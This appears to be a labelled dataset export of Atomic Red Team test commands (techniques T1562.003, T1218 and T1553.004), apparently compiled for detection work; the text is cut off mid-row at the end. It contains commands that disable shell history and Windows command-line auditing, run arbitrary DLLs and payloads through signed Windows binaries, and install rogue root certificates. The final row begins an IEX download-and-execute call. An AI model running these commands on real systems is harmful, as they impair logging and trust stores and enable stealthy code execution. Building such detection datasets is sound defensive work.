",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d5d58a2fedba4636efd77140,"echo $HISTFILE export HISTFILE=""/dev/null"" if [ $(echo $HISTFILE) == ""/dev/null"" ]; then echo ""\$HISTFILE is /dev/null""; fi","echo $HISTFILE export HISTFILE=""/dev/null"" if [ $(echo $HISTFILE) == ""/dev/null"" ]; then echo ""\$HISTFILE is /dev/null""; fi",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.003/T1562.003.yaml,Setting the HISTFILE environment variable (freebsd),T1562.003,"[""T1562.003""]",linux,0.9,False,"An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system. Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ef930a74e093f04aee74430a,export HISTFILE=~/.sh_history,export HISTFILE=~/.sh_history,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.003/T1562.003.yaml,Setting the HISTFILE environment variable (freebsd),T1562.003,"[""T1562.003""]",linux,0.55,True,"An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system. Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review af0bac689b1a170b95fb2de0,"if ((${#HISTIGNORE[@]})); then echo ""\$HISTIGNORE = $HISTIGNORE""; else export HISTIGNORE='ls*:rm*:ssh*'; echo ""\$HISTIGNORE = $HISTIGNORE""; fi history -c ls -la $HISTFILE ls -la ~/.bash_logout if [ $(history |wc -l) -eq 1 ]; then echo ""ls commands are not in history""; fi unset HISTIGNORE if ((${#HISTIGNORE[@]})); then echo ""\$HISTIGNORE = $HISTIGNORE""; else export HISTIGNORE='*'; echo ""\$HISTIGNORE = $HISTIGNORE""; fi history -c whoami groups if [ $(history |wc -l) -eq 0 ]; then echo ""History cache is empty""; fi","if ((${#HISTIGNORE[@]})); then echo ""\$HISTIGNORE = $HISTIGNORE""; else export HISTIGNORE='ls*:rm*:ssh*'; echo ""\$HISTIGNORE = $HISTIGNORE""; fi history -c ls -la $HISTFILE ls -la ~/.bash_logout if [ $(history |wc -l) -eq 1 ]; then echo ""ls commands are not in history""; fi unset HISTIGNORE if ((${#HISTIGNORE[@]})); then echo ""\$HISTIGNORE = $HISTIGNORE""; else export HISTIGNORE='*'; echo ""\$HISTIGNORE = $HISTIGNORE""; fi history -c whoami groups if [ $(history |wc -l) -eq 0 ]; then echo ""History cache is empty""; fi",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.003/T1562.003.yaml,Setting the HISTIGNORE environment variable,T1562.003,"[""T1562.003""]",linux,0.9,False,"An Adversary may take advantage of the HISTIGNORE environment variable either to ignore particular commands or all commands. In this test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this history cache 3..4 execute ls commands 5. confirm that the ls commands are not in the history cache 6. unset HISTIGNORE variable 7.. same again, but ignoring ALL commands. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 75dfd3fa5bb6e683c8a44e33,unset HISTIGNORE,unset HISTIGNORE,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.003/T1562.003.yaml,Setting the HISTIGNORE environment variable,T1562.003,"[""T1562.003""]",linux,0.55,True,"An Adversary may take advantage of the HISTIGNORE environment variable either to ignore particular commands or all commands. In this test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this history cache 3..4 execute ls commands 5. confirm that the ls commands are not in the history cache 6. unset HISTIGNORE variable 7.. same again, but ignoring ALL commands. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d178154906c7cc73f7c45ff1,reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 0 /f,reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 0 /f,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.003/T1562.003.yaml,Disable Windows Command Line Auditing using reg.exe,T1562.003,"[""T1562.003""]",windows,0.9,False,"In Windows operating systems, command line auditing is controlled through the following registry value: Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit Registry Value: ProcessCreationIncludeCmdLine_Enabled When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution. This information is c",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 034c325e419d542366009374,reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f,reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.003/T1562.003.yaml,Disable Windows Command Line Auditing using reg.exe,T1562.003,"[""T1562.003""]",windows,0.55,True,"In Windows operating systems, command line auditing is controlled through the following registry value: Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit Registry Value: ProcessCreationIncludeCmdLine_Enabled When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution. This information is c",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8cf65658f22dc438228a9629,"New-ItemProperty -Path ""HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit"" -Name ""ProcessCreationIncludeCmdLine_Enabled"" -Value 0 -PropertyType DWORD -Force -ErrorAction Ignore","New-ItemProperty -Path ""HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit"" -Name ""ProcessCreationIncludeCmdLine_Enabled"" -Value 0 -PropertyType DWORD -Force -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.003/T1562.003.yaml,Disable Windows Command Line Auditing using Powershell Cmdlet,T1562.003,"[""T1562.003""]",windows,0.9,False,"In Windows operating systems, command line auditing is controlled through the following registry value: Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit Registry Value: ProcessCreationIncludeCmdLine_Enabled When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution. This information is c",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 38e4305d5d8747dfe1de81b3,"New-ItemProperty -Path ""HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit"" -Name ""ProcessCreationIncludeCmdLine_Enabled"" -Value 1 -PropertyType DWORD -Force -ErrorAction Ignore","New-ItemProperty -Path ""HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit"" -Name ""ProcessCreationIncludeCmdLine_Enabled"" -Value 1 -PropertyType DWORD -Force -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.003/T1562.003.yaml,Disable Windows Command Line Auditing using Powershell Cmdlet,T1562.003,"[""T1562.003""]",windows,0.55,True,"In Windows operating systems, command line auditing is controlled through the following registry value: Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit Registry Value: ProcessCreationIncludeCmdLine_Enabled When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution. This information is c",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2fbe959e99abebc6fcd44f70,"mavinject.exe #{process_id} /INJECTRUNNING ""#{dll_payload}""","mavinject.exe #{process_id} /INJECTRUNNING ""#{dll_payload}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218/T1218.yaml,mavinject - Inject DLL into running process,T1218,"[""T1218""]",windows,0.9,False,"Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b4ad1bc1f3e1416a2aa626a5,"C:\Windows\SysWow64\Register-CimProvider.exe -Path ""#{dll_payload}""","C:\Windows\SysWow64\Register-CimProvider.exe -Path ""#{dll_payload}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218/T1218.yaml,Register-CimProvider - Execute evil dll,T1218,"[""T1218""]",windows,0.9,False,"Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5d4b488555c04ff3f56a16e5,"InfDefaultInstall.exe ""#{inf_to_execute}""","InfDefaultInstall.exe ""#{inf_to_execute}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218/T1218.yaml,InfDefaultInstall.exe .inf Execution,T1218,"[""T1218""]",windows,0.9,False,"Test execution of a .inf using InfDefaultInstall.exe Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 99fac1bc40a7e0a26992088e,"FOR /F ""tokens=2*"" %a in ('reg query ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe"" /V PATH') do set microsoft_wordpath=%b call ""%microsoft_wordpath%\protocolhandler.exe"" ""ms-word:nft|u|#{remote_url}""","FOR /F ""tokens=2*"" %a in ('reg query ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe"" /V PATH') do set microsoft_wordpath=%b call ""%microsoft_wordpath%\protocolhandler.exe"" ""ms-word:nft|u|#{remote_url}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218/T1218.yaml,ProtocolHandler.exe Downloaded a Suspicious File,T1218,"[""T1218""]",windows,0.9,False,"Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3a558e3e73c1051e14deeeea,"#{mwcpath}\#{mwcname} ""#{xml_payload}"" output.txt","#{mwcpath}\#{mwcname} ""#{xml_payload}"" output.txt",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218/T1218.yaml,Microsoft.Workflow.Compiler.exe Payload Execution,T1218,"[""T1218""]",windows,0.9,False,"Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fe9a8cea3f374ac4dd0b60f1,"&""#{renamed_binary}"" ""#{xml_payload}"" output.txt","&""#{renamed_binary}"" ""#{xml_payload}"" output.txt",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218/T1218.yaml,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,T1218,"[""T1218""]",windows,0.9,False,"Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3730d93f56e1bb3b4ddb3925,Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path},Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218/T1218.yaml,Invoke-ATHRemoteFXvGPUDisablementCommand base test,T1218,"[""T1218""]",windows,0.9,False,"RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as ""PowerShell module load-order hijacking"" where a module containing, in this case, a",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 915eda06855f2aaf9611bdb8,#{dspath} -S #{txt_payload},#{dspath} -S #{txt_payload},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218/T1218.yaml,DiskShadow Command Execution,T1218,"[""T1218""]",windows,0.9,False,"Emulates attack with a DiskShadow.exe (LOLBIN installed by default on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3f58f795664963885b93525f,"wuauclt.exe /UpdateDeploymentProvider ""#{arbitrary_dll}"" /RunHandlerComServer","wuauclt.exe /UpdateDeploymentProvider ""#{arbitrary_dll}"" /RunHandlerComServer",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218/T1218.yaml,Load Arbitrary DLL via Wuauclt (Windows Update Client),T1218,"[""T1218""]",windows,0.9,False,"This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. See https://dtm.uk/wuauclt/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d61dafb728363cc9248593b3,taskkill /f /im calculator.exe > nul 2>&1,taskkill /f /im calculator.exe > nul 2>&1,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218/T1218.yaml,Load Arbitrary DLL via Wuauclt (Windows Update Client),T1218,"[""T1218""]",windows,0.55,True,"This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. See https://dtm.uk/wuauclt/ ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ebc482fbf3c7c0290ff652ae,Gpscript /logon,Gpscript /logon,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218/T1218.yaml,Lolbin Gpscript logon option,T1218,"[""T1218""]",windows,0.9,False,"Executes logon scripts configured in Group Policy. https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d8fc7fa13fe90c5c69deeafd,Gpscript /startup,Gpscript /startup,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218/T1218.yaml,Lolbin Gpscript startup option,T1218,"[""T1218""]",windows,0.9,False,"Executes startup scripts configured in Group Policy https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4b3b42487d1c7461cf6c3d9c,"copy #{Path_ie4uinit} %TEMP%\ie4uinit.exe copy ""#{Path_inf}"" %TEMP%\ieuinit.inf %TEMP%\ie4uinit.exe -BaseSettings","copy #{Path_ie4uinit} %TEMP%\ie4uinit.exe copy ""#{Path_inf}"" %TEMP%\ieuinit.inf %TEMP%\ie4uinit.exe -BaseSettings",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218/T1218.yaml,Lolbas ie4uinit.exe use as proxy,T1218,"[""T1218""]",windows,0.9,False,"Executes commands from a specially prepared ie4uinit.inf file. Poc from : https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ Reference: https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4ddbd0527d3a991830ecd3dc,del %TEMP%\ie4uinit.exe >nul 2>&1 del %TEMP%\ieuinit.inf >nul 2>&1,del %TEMP%\ie4uinit.exe >nul 2>&1 del %TEMP%\ieuinit.inf >nul 2>&1,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218/T1218.yaml,Lolbas ie4uinit.exe use as proxy,T1218,"[""T1218""]",windows,0.55,True,"Executes commands from a specially prepared ie4uinit.inf file. Poc from : https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ Reference: https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/ ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8463e9d5795f9589bfef756f,"if (-not (Test-Path #{dest_path})) { New-Item -Path #{dest_path} -ItemType Directory } else { Write-Host ""Directory #{dest_path} already exists."" } Copy-Item -Path ""C:\windows\system32\customshellhost.exe"" -Destination ""#{dest_path}\customshellhost.exe"" -Force Copy-Item -Path ""C:\windows\system32\calc.exe"" -Destination ""#{dest_path}\explorer.exe"" -Force #{dest_path}\customshellhost.exe","if (-not (Test-Path #{dest_path})) { New-Item -Path #{dest_path} -ItemType Directory } else { Write-Host ""Directory #{dest_path} already exists."" } Copy-Item -Path ""C:\windows\system32\customshellhost.exe"" -Destination ""#{dest_path}\customshellhost.exe"" -Force Copy-Item -Path ""C:\windows\system32\calc.exe"" -Destination ""#{dest_path}\explorer.exe"" -Force #{dest_path}\customshellhost.exe",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218/T1218.yaml,LOLBAS CustomShellHost to Spawn Process,T1218,"[""T1218""]",windows,0.9,False,"This test simulates an adversary copying `customshellhost.exe` and `calc.exe` from `C:\windows\system32\` to `C:\temp\`, renaming `calc.exe` to `explorer.exe`. Upon execution, customshellhost.exe will spawn calc.exe. Note this will only work on Windows 10 or 11. [LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/) [BishopFox](https://bishopfox.com/blog/edr-bypass-with-lolbins) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ecc48bdc3249c71c7aecedf1,Remove-Item -Path #{dest_path} -Recurse -Force,Remove-Item -Path #{dest_path} -Recurse -Force,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218/T1218.yaml,LOLBAS CustomShellHost to Spawn Process,T1218,"[""T1218""]",windows,0.55,True,"This test simulates an adversary copying `customshellhost.exe` and `calc.exe` from `C:\windows\system32\` to `C:\temp\`, renaming `calc.exe` to `explorer.exe`. Upon execution, customshellhost.exe will spawn calc.exe. Note this will only work on Windows 10 or 11. [LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/) [BishopFox](https://bishopfox.com/blog/edr-bypass-with-lolbins) ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review aec7d0c794291bede6737c52,reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0 reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe c:\windows\system32\provlaunch.exe LOLBin,reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0 reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe c:\windows\system32\provlaunch.exe LOLBin,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218/T1218.yaml,Provlaunch.exe Executes Arbitrary Command via Registry Key,T1218,"[""T1218""]",windows,0.9,False,"Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command. - https://twitter.com/0gtweet/status/1674399582162153472 - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ Registry keys are deleted after successful execution. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4133667a037af0074aa133d5,"$edgePath64 = ""C:\Program Files\Microsoft\Edge\Application\msedge.exe"" if (Test-Path $edgePath64) { $edgePath = $edgePath64 } else { # Check 32-bit Edge installation path $edgePath32 = ""C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"" if (Test-Path $edgePath32) { $edgePath = $edgePath32 } else { exit 1 } } & $edgePath --disable-gpu-sandbox --gpu-launcher=""C:\\Windows\\System32\\calc.exe &&"" sleep 5 taskkill -f -im msedge.exe taskkill -f -im calc.exe taskkill -f -im win32calc.exe","$edgePath64 = ""C:\Program Files\Microsoft\Edge\Application\msedge.exe"" if (Test-Path $edgePath64) { $edgePath = $edgePath64 } else { # Check 32-bit Edge installation path $edgePath32 = ""C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"" if (Test-Path $edgePath32) { $edgePath = $edgePath32 } else { exit 1 } } & $edgePath --disable-gpu-sandbox --gpu-launcher=""C:\\Windows\\System32\\calc.exe &&"" sleep 5 taskkill -f -im msedge.exe taskkill -f -im calc.exe taskkill -f -im win32calc.exe",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218/T1218.yaml,LOLBAS Msedge to Spawn Process,T1218,"[""T1218""]",windows,0.9,False,"Executes a process under a trusted Microsoft signed binary,mseddge. This test will spawn ""calc.exe"" as a child process of msedge.exe - https://lolbas-project.github.io/lolbas/Binaries/Msedge/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 69d9942bc15775ec7ebb13db,"wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u ""#{payload_path}""","wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u ""#{payload_path}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218/T1218.yaml,System Binary Proxy Execution - Wlrmdr Lolbin,T1218,"[""T1218""]",windows,0.9,False,Use wlrmdr(Windows Logon Reminder executable) as a proxy binary to evade defensive countermeasures,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9aeb9295c314ee7f0c4ec52f,"openssl genrsa -out #{key_filename} 4096 openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj ""/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com"" -out #{cert_filename} cp #{cert_filename} /etc/pki/ca-trust/source/anchors/ update-ca-trust","openssl genrsa -out #{key_filename} 4096 openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj ""/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com"" -out #{cert_filename} cp #{cert_filename} /etc/pki/ca-trust/source/anchors/ update-ca-trust",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.004/T1553.004.yaml,Install root CA on CentOS/RHEL,T1553.004,"[""T1553.004""]",linux,0.9,False,"Creates a root CA with openssl ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d7908bfdaf32c398e3f7193e,rm /etc/pki/ca-trust/source/anchors/#{cert_filename} update-ca-trust,rm /etc/pki/ca-trust/source/anchors/#{cert_filename} update-ca-trust,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.004/T1553.004.yaml,Install root CA on CentOS/RHEL,T1553.004,"[""T1553.004""]",linux,0.55,True,"Creates a root CA with openssl ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9b5d0f3cbc329fd850a4911a,"openssl genrsa -out #{key_filename} 4096 openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj ""/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com"" -out #{cert_filename} cp #{cert_filename} /usr/local/share/certs/ certctl rehash","openssl genrsa -out #{key_filename} 4096 openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj ""/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com"" -out #{cert_filename} cp #{cert_filename} /usr/local/share/certs/ certctl rehash",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.004/T1553.004.yaml,Install root CA on FreeBSD,T1553.004,"[""T1553.004""]",linux,0.9,False,"Creates a root CA with openssl ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2391bcbb57dc5e78083b62d9,rm /usr/local/share/certs/#{cert_filename} certctl rehash,rm /usr/local/share/certs/#{cert_filename} certctl rehash,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.004/T1553.004.yaml,Install root CA on FreeBSD,T1553.004,"[""T1553.004""]",linux,0.55,True,"Creates a root CA with openssl ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d68559d1aa42391aa11374bf,mv #{cert_filename} /usr/local/share/ca-certificates sudo update-ca-certificates,mv #{cert_filename} /usr/local/share/ca-certificates sudo update-ca-certificates,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.004/T1553.004.yaml,Install root CA on Debian/Ubuntu,T1553.004,"[""T1553.004""]",linux,0.9,False,"Creates a root CA with openssl ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3e5529778482043146a26a41,"sudo security add-trusted-cert -d -r trustRoot -k ""/Library/Keychains/System.keychain"" ""#{cert_filename}""","sudo security add-trusted-cert -d -r trustRoot -k ""/Library/Keychains/System.keychain"" ""#{cert_filename}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.004/T1553.004.yaml,Install root CA on macOS,T1553.004,"[""T1553.004""]",macos,0.9,False,"Creates a root CA with openssl ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2041c5b2530756ec3ce098f1,"$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My Move-Item -Path $cert.PSPath -Destination ""Cert:\LocalMachine\Root""","$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My Move-Item -Path $cert.PSPath -Destination ""Cert:\LocalMachine\Root""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.004/T1553.004.yaml,Install root CA on Windows,T1553.004,"[""T1553.004""]",windows,0.9,False,"Creates a root CA with Powershell ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4944d14346414617b55e171f,try { $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My -ErrorAction Ignore Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore } catch { },try { $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My -ErrorAction Ignore Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore } catch { },bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.004/T1553.004.yaml,Install root CA on Windows,T1553.004,"[""T1553.004""]",windows,0.55,True,"Creates a root CA with Powershell ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c9c7c5a7e0af8b9ad96df24c,certutil -addstore my #{pfx_path},certutil -addstore my #{pfx_path},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.004/T1553.004.yaml,Install root CA on Windows with certutil,T1553.004,"[""T1553.004""]",windows,0.9,False,"Creates a root CA with certutil ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 929eee2113cad4934a0a563d,try { $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore } catch { },try { $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore } catch { },bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.004/T1553.004.yaml,Install root CA on Windows with certutil,T1553.004,"[""T1553.004""]",windows,0.55,True,"Creates a root CA with certutil ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 72a3b20dcf925d95c3ee2e2d,IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing),IEX (IWR 